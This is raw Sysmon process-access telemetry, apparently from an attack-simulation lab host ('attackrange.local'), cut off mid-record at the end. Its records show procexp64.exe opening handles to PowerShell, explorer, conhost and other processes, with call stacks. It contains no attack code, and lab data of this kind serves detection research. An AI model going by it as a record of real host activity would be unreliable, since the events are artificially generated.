15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788435Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788434Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788433Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788432Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788431Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788430Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788429Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788428Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788427Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788426Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788425Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788424Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788423Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788422Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788421Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788420Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788419Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMIN